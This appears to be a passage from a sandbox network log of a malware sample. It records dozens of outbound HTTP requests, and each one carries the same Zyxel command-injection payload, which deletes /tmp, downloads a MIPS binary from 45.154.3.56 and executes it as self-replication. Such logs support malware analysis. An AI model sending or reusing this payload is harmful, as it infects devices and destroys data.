                        Session IDSource IPSource PortDestination IPDestination Port
                        1579192.168.2.1436758197.119.228.103443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096563101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1580192.168.2.145738477.219.206.122443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096602917 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1581192.168.2.1452876143.5.73.166443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096652031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1582192.168.2.14465065.203.188.143443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096694946 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1583192.168.2.1442536183.135.112.111443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096725941 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1584192.168.2.145999259.99.252.167443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096751928 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1585192.168.2.1436952141.9.61.219443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096788883 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1586192.168.2.1439922163.64.143.132443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096829891 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1587192.168.2.1443374104.228.185.234443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096877098 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1588192.168.2.144196267.78.41.92443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096901894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1589192.168.2.144164423.252.138.8443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096962929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1590192.168.2.145284037.79.21.252443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096980095 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1591192.168.2.145370037.119.186.164443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097044945 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1592192.168.2.1443812217.167.50.212443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097079992 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1593192.168.2.145026660.71.62.142443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097134113 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1594192.168.2.145075670.58.4.120443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097178936 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1595192.168.2.1459944205.52.158.66443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097233057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1596192.168.2.1440758183.207.221.104443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097268105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1597192.168.2.145109034.19.61.201443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097287893 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1598192.168.2.144778038.46.123.6443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097345114 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1599192.168.2.1445708133.177.70.238443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097390890 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1600192.168.2.145200858.105.59.182443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097435951 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1601192.168.2.1433594223.187.172.186443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097476959 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1602192.168.2.1454574101.206.25.235443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097541094 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1603192.168.2.143426275.106.127.156443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097584009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1604192.168.2.145229086.248.165.224443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097635984 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1605192.168.2.144368280.231.253.215443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097682953 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1606192.168.2.1434274212.11.253.185443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097713947 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1607192.168.2.14525668.122.41.15443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097779989 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1608192.168.2.1439530213.196.94.132443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097814083 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1609192.168.2.1450340183.84.208.138443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097860098 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1610192.168.2.1441632194.46.77.50443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097887993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1611192.168.2.1449824111.10.242.247443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097929955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1612192.168.2.143476472.216.113.199443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.097966909 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1613192.168.2.144532876.170.237.171443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098011017 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1614192.168.2.1458830157.240.10.215443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098072052 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1615192.168.2.1443112196.121.39.204443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098098993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1616192.168.2.1449368184.227.241.70443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098124981 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1617192.168.2.1441676217.181.134.173443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098201036 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1618192.168.2.1439248120.147.250.126443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098228931 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1619192.168.2.1459488176.51.194.56443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098258972 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1620192.168.2.1457910202.26.151.175443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098299026 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1621192.168.2.1441286148.156.155.49443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098334074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1622192.168.2.1446548185.237.55.194443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098362923 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1623192.168.2.1458876151.15.153.216443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098402023 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1624192.168.2.1446034129.186.225.127443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098453045 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1625192.168.2.144052099.128.187.70443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098505974 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1626192.168.2.145053699.0.36.0443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098557949 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1627192.168.2.1450022128.103.117.252443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098602057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1628192.168.2.144707071.197.206.32443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098642111 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1629192.168.2.145499273.214.113.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098670006 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1630192.168.2.1438826178.0.253.134443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098704100 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1631192.168.2.143315658.201.54.64443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098746061 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1632192.168.2.1435794207.99.249.150443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098789930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1633192.168.2.1439774170.88.185.197443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098822117 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1634192.168.2.1449698125.50.205.75443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098846912 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1635192.168.2.144648061.241.196.79443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098900080 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1636192.168.2.144508073.244.168.246443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098938942 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1637192.168.2.143320882.242.187.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.098978996 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1638192.168.2.145901878.209.107.220443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.099020958 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1639192.168.2.144830496.20.95.111443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.099061012 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1640192.168.2.1458824105.112.75.3443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.099101067 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1641192.168.2.143787280.37.176.151443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.099179029 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1642192.168.2.1446520196.168.157.9443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.099231005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1643192.168.2.144699488.129.124.99443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.099267006 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1644192.168.2.1446674114.27.138.69443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.103131056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1645192.168.2.1443446102.56.211.130443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.103153944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1646192.168.2.144323461.35.8.75443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.103183031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1647192.168.2.145884241.105.245.168443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.103240013 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1648192.168.2.1439076192.6.100.244443
                        TimestampBytes transferredDirectionData
